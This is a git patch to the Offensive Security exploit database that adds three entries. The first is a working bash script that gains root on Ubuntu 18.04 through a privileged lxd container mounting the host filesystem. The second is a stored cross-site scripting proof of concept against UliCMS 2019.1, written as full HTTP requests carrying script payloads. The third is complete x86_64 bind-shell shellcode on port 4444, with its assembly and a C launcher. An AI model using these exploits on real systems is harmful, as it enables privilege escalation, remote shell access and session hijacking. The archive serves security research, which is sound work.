From 51bf94ed48a0ffb1ca4cce007b8c9ac07f7be98e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 11 Jun 2019 05:01:53 +0000 Subject: [PATCH] DB: 2019-06-11 5 changes to exploits/shellcodes Ubuntu 18.04 - 'lxd' Privilege Escalation UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes) --- exploits/linux/local/46978.sh | 50 ++++++++++ exploits/php/webapps/46840.txt | 4 - exploits/php/webapps/46852.txt | 6 -- exploits/php/webapps/46977.txt | 65 +++++++++++++ files_exploits.csv | 2 + files_shellcodes.csv | 1 + shellcodes/linux_x86-64/46979.c | 166 ++++++++++++++++++++++++++++++++ 7 files changed, 284 insertions(+), 10 deletions(-) create mode 100755 exploits/linux/local/46978.sh create mode 100644 exploits/php/webapps/46977.txt create mode 100644 shellcodes/linux_x86-64/46979.c diff --git a/exploits/linux/local/46978.sh b/exploits/linux/local/46978.sh new file mode 100755 index 000000000..a3c2414bc --- /dev/null +++ b/exploits/linux/local/46978.sh @@ -0,0 +1,50 @@ +#!/usr/bin/env bash + +# ---------------------------------- +# Authors: Marcelo Vazquez (S4vitar) +# Victor Lasa (vowkin) +# ---------------------------------- + +# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine] +# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine] +# Step 3: Run this script and you will get root [Victim Machine] +# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine + +function helpPanel(){ + echo -e "\nUsage:" + echo -e "\t[-f] Filename (.tar.gz alpine file)" + echo -e "\t[-h] Show this help panel\n" + exit 1 +} + +function createContainer(){ + lxc image import $filename --alias alpine && lxd init --auto + echo -e "[*] Listing images...\n" && lxc image list + lxc init alpine privesc -c security.privileged=true + lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true + lxc start privesc + lxc exec privesc sh + cleanup +} + +function cleanup(){ + echo -en "\n[*] Removing container..." + lxc stop privesc && lxc delete privesc && lxc image delete alpine + echo " [√]" +} + +set -o nounset +set -o errexit + +declare -i parameter_enable=0; while getopts ":f:h:" arg; do + case $arg in + f) filename=$OPTARG && let parameter_enable+=1;; + h) helpPanel;; + esac +done + +if [ $parameter_enable -ne 1 ]; then + helpPanel +else + createContainer +fi \ No newline at end of file diff --git a/exploits/php/webapps/46840.txt b/exploits/php/webapps/46840.txt index fdf73fd1d..ca3292869 100644 --- a/exploits/php/webapps/46840.txt +++ b/exploits/php/webapps/46840.txt @@ -33,8 +33,6 @@ Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp -# Software Link: -http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows @@ -62,8 +60,6 @@ Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp -# Software Link: -http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows diff --git a/exploits/php/webapps/46852.txt b/exploits/php/webapps/46852.txt index decca2a42..0b94fa49d 100644 --- a/exploits/php/webapps/46852.txt +++ b/exploits/php/webapps/46852.txt @@ -5,8 +5,6 @@ # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 -# Software Link: -https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/ # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows @@ -29,8 +27,6 @@ Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 -# Software Link: -https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/ # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows @@ -53,8 +49,6 @@ INPUT]2350265[SQL Inject Here] # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 -# Software Link: -https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/ # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows diff --git a/exploits/php/webapps/46977.txt b/exploits/php/webapps/46977.txt new file mode 100644 index 000000000..e297f7737 --- /dev/null +++ b/exploits/php/webapps/46977.txt @@ -0,0 +1,65 @@ +# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting +# Google Dork: intext:"by UliCMS" +# Date: 2019-05-12 +# Exploit Author: Unk9vvN +# Vendor Homepage: https://en.ulicms.de +# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig +# Version: 2019.1 +# Tested on: Kali Linux +# CVE : CVE-2019-11398 + + +# Description +# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows. + +# Vuln One +# URI: POST /ulicms/admin/index.php?action=languages +# Parameter: name="> + +# Vuln Two +# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23 +# Parameter: systemname="> + + +# +# PoC POST (Cross Site Scripting Stored) +# +POST /ulicms/admin/index.php HTTP/1.1 +Host: XXXXXXXX.ngrok.io +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages +Content-Type: application/x-www-form-urlencoded +Content-Length: 165 +Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E + + +# +# PoC POST (Cross Site Scripting Stored) +# +POST /ulicms/admin/index.php HTTP/1.1 +Host: XXXXXXXX.ngrok.io +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 904 +Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 +Connection: close +DNT: 1 + +csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content= + + +# Discovered by: +t.me/Unk9vvN \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e77f20dd2..1ebc22f40 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10542,6 +10542,7 @@ id,file,description,date,author,type,platform,port 46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows, 46973,exploits/linux/local/46973.md,"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution",2019-06-04,Arminius,local,linux, 46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows, +46978,exploits/linux/local/46978.sh,"Ubuntu 18.04 - 'lxd' Privilege Escalation",2019-06-10,s4vitar,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41384,3 +41385,4 @@ id,file,description,date,author,type,platform,port 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp, 46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware, +46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 019264821..08547c998 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -968,3 +968,4 @@ id,file,description,date,author,type,platform 46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64 46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64 +46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/46979.c b/shellcodes/linux_x86-64/46979.c new file mode 100644 index 000000000..c9273ed47 --- /dev/null +++ b/shellcodes/linux_x86-64/46979.c @@ -0,0 +1,166 @@ +;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) (104 bytes) +;Author: Aron Mihaljevic +;Architecture: Linux x86_64 +;Shellcode Length: 104 bytes +;github = https://github.com/STARRBOY +;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444" + + +================== ASSEMBLY ======================================== + +global _start + + +section .text + +_start: + + + + ;create_socket + ;int socket(AF_INET, SOCK_STREAM, 0); + + push 41 ;sys_socket + pop rax + push 2 ;AF_INET + pop rdi + push 1 ;SOCK_STREAM + pop rsi + xor rdx, rdx + syscall + + ;save the return value for future use + xchg rdi, rax + + + ; sin_zero: 0 + ; sin_addr.s_addr: INADDR_ANY = 0 + ; sin_port: 4444 + ; sin_family: AF_INET = 2 + + push 2 ;sin_family = AF_INET + mov word [rsp + 2], 0x5c11 ;port = 4444 + push rsp + pop rsi + + + + +bind: + ;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen); + + push 49 ;sys_bind + pop rax + push rsp + pop rsi ;sockaddr stack pointer + push 16 ;sizeof sockaddr + pop rdx + syscall + + +listen: + ;int listen(int sockfd, int backlog); + + push 50 ;sys_listen + pop rax + push 1 + pop rsi ;backlog = number of clients = 1 + syscall + + +accept: + ;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); + + + + + push 43 ;sys_accept + pop rax + sub rsp, 16 ;size of the structure on the stack + push rsp + pop rsi ;struct sockaddr + push 16 ;length of the address + push rsp ;stack pointer for struct size + pop rdx + syscall + + + xchg r10, rax ;save client socket in r10, since we won't use that register for any other operation + + +close: + ;int close(int fd); + + push 3 ;sys_close + pop rax + push rax ;save 3 on the stack for rsi in dup2 + syscall + + + xchg rdi, r10 ;client socket as first parameter for dup2 + pop rsi ;parameter for dup2 = 3 + +dup2loop: + + ; int dup2(int oldfd, int newfd); + + push 33 ;sys_dup2 + pop rax + dec rsi + syscall + loopnz dup2loop + + + +spawn_shell: + + ;int execve(const char *filename, char *const argv[],char *const envp[]); + + xor rsi, rsi ;clear rsi + push rsi ;push null on the stack + mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order + push rdi + push rsp + pop rdi ;stack pointer to /bin//sh + mov al, 59 ;sys_execve + cdq ;sign extend of eax + syscall + + + + + + +=======Generate Shellcode========================================== +nasm -felf64 tcp_bind_shell.nasm -o tcp_bind_shell.o +ld tcp_bind_shell.o -o tcp_bind_shell + + +=========generate C program to exploit============================= +gcc -fno-stack-protector -z execstack bind.c -o bind + + +======================C program===================================== + +#include +#include + +unsigned char shellcode[]=\ + "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05" + "\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a" + "\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01" + "\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10" + "\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87" + "\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31" + "\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54" + "\x5f\xb0\x3b\x99\x0f\x05"; + + +int main(){ + + printf("length of your shellcode is: %d\n", (int)strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + + ret(); +} \ No newline at end of file